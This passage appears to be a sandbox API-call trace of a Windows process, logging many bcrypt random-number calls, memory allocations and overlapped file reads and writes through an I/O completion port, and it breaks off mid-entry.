[0163.683] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.684] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0163.684] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.684] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0163.685] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.685] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.685] free (_Block=0x3e305b8) [0163.685] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.685] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0163.685] free (_Block=0x1fa91d0) [0163.685] free (_Block=0x1fa2ed8) [0163.685] free (_Block=0x1fa90b8) [0163.685] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0163.686] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.701] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.701] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0163.701] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.702] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.702] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0163.702] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.702] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.702] free (_Block=0x3e305b8) [0163.702] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.702] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0163.703] free (_Block=0x1fa91d0) [0163.703] free (_Block=0x1fa2ed8) [0163.703] free (_Block=0x1fa90b8) [0163.703] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0163.703] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.727] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1ff0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0163.728] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.754] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.755] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0163.755] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.756] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.756] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0163.756] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.756] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.756] free (_Block=0x3e305b8) [0163.756] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.756] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0163.757] free (_Block=0x1fa91d0) [0163.757] free (_Block=0x1fa2ed8) [0163.757] free (_Block=0x1fa90b8) [0163.757] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0163.757] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.757] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xff0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0163.757] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.846] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xd00, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0163.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0163.846] CloseHandle (hObject=0x308) returned 1 [0163.847] free (_Block=0x1ff1e60) [0163.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0164.069] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.069] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0164.069] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.070] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0164.070] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0164.070] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0164.070] free (_Block=0x3e305b8) [0164.070] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0164.070] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0164.070] free (_Block=0x1fa91d0) [0164.070] free (_Block=0x1fa2ed8) [0164.071] free (_Block=0x1fa90b8) [0164.071] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0164.071] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0164.071] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0164.071] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0164.105] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xe14, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0164.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0164.105] CloseHandle (hObject=0x308) returned 1 [0164.105] free (_Block=0x1ff1e60) [0164.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0164.116] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.117] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0164.117] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.117] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.117] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0164.118] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0164.118] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0164.118] free (_Block=0x3e305b8) [0164.118] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0164.118] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0164.119] free (_Block=0x1fa91d0) [0164.119] free (_Block=0x1fa2ed8) [0164.119] free (_Block=0x1fa90b8) [0164.119] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0164.119] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0164.146] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.150] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0164.150] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.150] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0164.151] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0164.151] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0164.151] free (_Block=0x3e305b8) [0164.151] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0164.151] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0164.151] free (_Block=0x1fa91d0) [0164.151] free (_Block=0x1fa2ed8) [0164.151] free (_Block=0x1fa90b8) [0164.151] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0164.152] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0164.168] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x17d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0164.168] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0164.172] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xc74, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0164.172] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0164.408] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0164.408] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0164.419] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0164.452] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0164.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0164.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0164.452] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0164.453] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0164.453] free (_Block=0x3e305b8) [0164.453] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0164.453] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0164.453] free (_Block=0x1fa91d0) [0164.453] free (_Block=0x1fa2ed8) [0164.453] free (_Block=0x1fa90b8) [0164.453] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0164.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0164.484] CloseHandle (hObject=0x170) returned 1 [0164.484] free (_Block=0x1ff1e60) [0164.485] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0164.491] ReadFile (in: hFile=0x2a4, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1e98, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0164.502] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0164.509] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xd24, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0164.509] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0165.092] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x5080, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0165.095] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0165.097] CloseHandle (hObject=0x170) returned 1 [0165.097] free (_Block=0x3df0008) [0165.097] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0165.097] CloseHandle (hObject=0x2a4) returned 1 [0165.097] free (_Block=0x3d70450) [0165.097] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0165.099] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.100] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0165.133] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0165.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0165.136] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.136] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0165.136] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.137] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.137] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0165.137] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.137] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.137] free (_Block=0x3e305b8) [0165.137] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.137] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0165.138] free (_Block=0x1fa91d0) [0165.138] free (_Block=0x77d7a8) [0165.138] free (_Block=0x1fa90b8) [0165.138] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0165.138] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0165.149] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2fc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.150] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0165.161] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0165.161] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0165.170] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x1948, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0165.177] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0165.188] CloseHandle (hObject=0x170) returned 1 [0165.189] free (_Block=0x3f70048) [0165.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0165.202] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1c30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0165.202] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0165.216] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0165.216] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0165.230] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x3218, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0165.233] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0165.234] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0165.235] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0166.537] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x8db0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: 